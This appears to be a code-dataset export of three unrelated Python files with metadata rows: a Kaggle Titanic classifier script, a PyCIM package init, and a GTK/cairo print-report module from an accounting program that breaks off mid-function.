df.loc[ (df.Age.isnull()) & (df.Gender == i) & (df.Pclass == j + 1), 'AgeFill'] = median_ages[i, j]
df['AgeIsNull'] = pd.isnull(df.Age).astype(int)
df['FamilySize'] = df['SibSp'] + df['Parch']
df['Age*Class'] = df.AgeFill * df.Pclass
df = df.drop(['Name', 'Sex', 'Ticket', 'Cabin', 'Embarked'], axis=1)
df = df.drop(['Age'], axis=1)
df.loc[df.Fare.isnull(), 'Fare'] = df['Fare'].dropna().median()
return df.values
# For .read_csv, always use header=0 when you know row 0 is the header row
train_df = pd.read_csv('/home/namukhtar/Datasets/kaggle/titanic/train.csv', header=0)
# print train_df.head(10)
train_data = pre_process(train_df)
test_df = pd.read_csv('/home/namukhtar/Datasets/kaggle/titanic/test.csv', header=0)
# print test_df.head(10)
test_data = pre_process(test_df)
# Import the random forest package
from sklearn.ensemble import RandomForestClassifier
# Create the random forest object which will include all the parameters
# for the fit
forest = RandomForestClassifier(n_estimators=100)
# Fit the training data to the Survived labels and create the decision trees
forest = forest.fit(train_data[0::, 2::], train_data[0::, 1])
# Take the same decision trees and run it on the test data
output = forest.predict(test_data[0::, 1::])
out_df = pd.DataFrame({'PassengerId' : test_data[0::, 0], 'Survived' : output})
out_df["PassengerId"] = out_df["PassengerId"].astype("int")
out_df["Survived"] = out_df["Survived"].astype("int")
out_df.to_csv('titanic-randomforest.csv', index=False)
from sklearn import svm
svc = svm.SVC(kernel='linear')
svc = svc.fit(train_data[0::, 2::], train_data[0::, 1])
# Take the same decision trees and run it on the test data
output = svc.predict(test_data[0::, 1::])
out_df = pd.DataFrame({'PassengerId' : test_data[0::, 0], 'Survived' : output})
out_df["PassengerId"] = out_df["PassengerId"].astype("int")
out_df["Survived"] = out_df["Survived"].astype("int")
out_df.to_csv('titanic-svm.csv', index=False)
|
apache-2.0
| 3,864,201,086,278,969,000 | 32.210526 | 111 | 0.618859 | false |
rwl/PyCIM
|
CIM14/CDPSM/Unbalanced/IEC61968/WiresExt/__init__.py
|
1
|
2312
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""This package contains the information classes that extend IEC61970::Wires package with power system resources required for distribution network modelling, including unbalanced networks.
"""
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionTransformerWinding import DistributionTransformerWinding
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionLineSegment import DistributionLineSegment
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.WindingPiImpedance import WindingPiImpedance
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionTapChanger import DistributionTapChanger
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.PerLengthSequenceImpedance import PerLengthSequenceImpedance
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.TransformerBank import TransformerBank
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.PerLengthPhaseImpedance import PerLengthPhaseImpedance
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionTransformer import DistributionTransformer
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.PhaseImpedanceData import PhaseImpedanceData
nsURI = "http://iec.ch/TC57/2009/CIM-schema-cim14?profile=http://iec.ch/TC57/2007/profile#WiresExt"
nsPrefix = "cimWiresExt"
|
mit
| 5,737,497,561,522,835,000 | 63.222222 | 188 | 0.831315 | false |
yazdan/AmirAccounting
|
amir/printreport.py
|
1
|
35708
|
import pygtk
import gtk
import pango
import cairo
import pangocairo
import logging
import math
import utility
from amirconfig import config
class PrintReport:
def __init__(self, content, cols_width, heading=None):
# self.lines_per_page = 24
self.cell_margin = 4
self.line = 2 #the thinest possible width of lines.
self.row_height = 2 * (config.contentfont + self.cell_margin)
self.header_height = 0
self.heading_height = 35
self.operation = gtk.PrintOperation()
settings = gtk.PrintSettings()
paper_size = gtk.paper_size_new_from_ppd(config.paper_ppd, config.paper_name, config.paper_width, config.paper_height)
self.page_setup = gtk.PageSetup()
self.page_setup.set_paper_size(paper_size)
self.page_setup.set_orientation(config.paper_orientation)
# self.page_setup = gtk.print_run_page_setup_dialog(None, self.page_setup, settings)
self.page_setup.set_top_margin(config.topmargin, gtk.UNIT_POINTS)
self.page_setup.set_bottom_margin(config.botmargin, gtk.UNIT_POINTS)
self.page_setup.set_right_margin(config.rightmargin, gtk.UNIT_POINTS)
self.page_setup.set_left_margin(config.leftmargin, gtk.UNIT_POINTS)
self.operation.set_default_page_setup(self.page_setup)
self.operation.set_unit(gtk.UNIT_POINTS)
self.content = content
tablewidth = self.page_setup.get_page_width(gtk.UNIT_POINTS)
tablewidth -= (len(cols_width) * (self.line + self.cell_margin)) + self.line + (config.rightmargin + config.leftmargin)
self.cols_width = []
for percent in cols_width:
self.cols_width.append(math.floor((percent * tablewidth) / 100))
# self.cols_width = cols_width
self.heading = heading
self.operation.connect("begin_print", self.beginPrint)
self.operation.connect("draw-page", self.printPage)
self.type = 0
self.title = ""
self.fields = {}
##self.content = data
def setHeader (self, title, fields):
self.title = title
self.fields = fields
def beginPrint(self, operation, context):
tableheight = self.page_setup.get_page_height(gtk.UNIT_POINTS)
name_lineheight = 2 * config.namefont
header_lineheight = 2 * config.headerfont
tableheight -= (math.floor((len(self.fields) + 1) / 2) * header_lineheight) + (config.topmargin + config.botmargin) + self.heading_height + name_lineheight + (self.cell_margin * 2)
self.lines_per_page = int(math.floor(tableheight / self.row_height))
#Subtract two lines that show "Sum of previous page" and "Sum"
self.lines_per_page -= 2
pages = ((len(self.content) - 1) / self.lines_per_page ) + 1
operation.set_n_pages(pages)
def doPrintJob(self, action):
self.operation.run(action)
def printPage(self, operation, context, page_nr):
self.pangolayout = context.create_pango_layout()
self.cairo_context = context.get_cairo_context()
self.pangolayout.set_width(-1)
self.pangocairo = pangocairo.CairoContext(self.cairo_context)
self.formatHeader()
getattr(self, self.drawfunction)(page_nr)
#self.drawDailyNotebook(page_nr)
def formatHeader(self):
LINE_HEIGHT = 2 * (config.namefont)
# MARGIN = self.page_margin
# cwidth = context.get_width()
cwidth = self.page_setup.get_page_width(gtk.UNIT_POINTS)
logging.info("Paper width: " + str(cwidth))
cr = self.cairo_context
fontsize = config.namefont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
if self.title != "":
self.pangolayout.set_text(self.title)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_CENTER)
cr.move_to ((cwidth - width / pango.SCALE) / 2, (LINE_HEIGHT - (height/ pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
# cr.move_to((cwidth + width / pango.SCALE) / 2, LINE_HEIGHT + config.topmargin)
# cr.line_to((cwidth - width / pango.SCALE) / 2, LINE_HEIGHT + config.topmargin)
cr.move_to((cwidth + width / pango.SCALE) / 2, LINE_HEIGHT + self.cell_margin)
cr.line_to((cwidth - width / pango.SCALE) / 2, LINE_HEIGHT + self.cell_margin)
addh = LINE_HEIGHT + self.cell_margin
LINE_HEIGHT = 2 * config.headerfont
fontsize = config.headerfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
flag = 1
for k,v in self.fields.items():
self.pangolayout.set_text(k + ": " + v)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_CENTER)
if flag == 1:
addh += LINE_HEIGHT
cr.move_to (cwidth - (width / pango.SCALE) - config.rightmargin, addh - (height/ pango.SCALE)/2)
flag = 0
else:
cr.move_to ((width / pango.SCALE) + config.leftmargin, addh - (height/ pango.SCALE)/2)
flag = 1
self.pangocairo.show_layout(self.pangolayout)
cr.stroke()
self.header_height = addh + 8
def drawDailyNotebook(self, page_nr):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
# PAGE_MARGIN = self.page_margin
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
# #Table top line
# cr.move_to(PAGE_MARGIN, TABLE_TOP)
# cr.line_to(RIGHT_EDGE, TABLE_TOP)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
right_txt = RIGHT_EDGE
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 3):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum of previous page"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.debt_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.credit_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
addh= ROW_HEIGHT + TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
if dindex == 3:
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
else:
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
self.debt_sum += int(row[4].replace(",", ""))
self.credit_sum += int(row[5].replace(",", ""))
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
right_txt = RIGHT_EDGE
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 3):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
cr.move_to(right_txt, addh + ROW_HEIGHT)
cr.line_to(RIGHT_EDGE, addh + ROW_HEIGHT)
cr.stroke()
def drawSubjectNotebook(self, page_nr):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
# PAGE_MARGIN = self.page_margin
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
# #Table top line
# cr.move_to(PAGE_MARGIN, TABLE_TOP)
# cr.line_to(RIGHT_EDGE, TABLE_TOP)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
right_txt = RIGHT_EDGE
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 2):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum of previous page"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[2]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.debt_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.credit_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
if page_nr == 0:
remaining = int(self.content[0][3].replace(",", "")) - int(self.content[0][4].replace(",", ""))
if self.content[0][5] == _("deb"):
remaining -= int(self.content[0][6].replace(",", ""))
else:
remaining += int(self.content[0][6].replace(",", ""))
if remaining < 0:
self.diagnose = _("deb")
self.remaining = utility.showNumber(-(remaining))
else:
if remaining == 0:
self.diagnose = _("equ")
else:
self.diagnose = _("cre")
self.remaining = utility.showNumber(remaining)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.diagnose)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.remaining)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[6]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
addh= ROW_HEIGHT + TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
if dindex == 2:
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
else:
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
self.debt_sum += int(row[3].replace(",", ""))
self.credit_sum += int(row[4].replace(",", ""))
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
self.diagnose = self.content[rindex + offset - 1][5]
self.remaining = self.content[rindex + offset - 1][6]
right_txt = RIGHT_EDGE
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 2):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[2]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.diagnose)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.remaining)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[6]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
# cr.move_to(self.page_margin, addh + ROW_HEIGHT)
cr.move_to(right_txt, addh + ROW_HEIGHT)
cr.line_to(RIGHT_EDGE, addh + ROW_HEIGHT)
cr.stroke()
def drawDocument(self, page_nr):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
# PAGE_MARGIN = self.page_margin
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
# #Table top line
# cr.move_to(PAGE_MARGIN, TABLE_TOP)
# cr.line_to(RIGHT_EDGE, TABLE_TOP)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
self.debt_sum = 0
self.credit_sum = 0
addh= TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
if dindex == 2 or dindex == 3:
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
else:
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
self.debt_sum += int(row[4].replace(",", ""))
self.credit_sum += int(row[5].replace(",", ""))
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
right_txt = RIGHT_EDGE
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= 4*(MARGIN + LINE) + self.cols_width[0] + self.cols_width[1] + self.cols_width[2]
self.pangolayout.set_text(_("Sum"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(right_txt, addh)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
cr.move_to(right_txt, addh + ROW_HEIGHT)
cr.line_to(RIGHT_EDGE, addh + ROW_HEIGHT)
cr.stroke()
def drawTrialReport(self, page_nr):
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
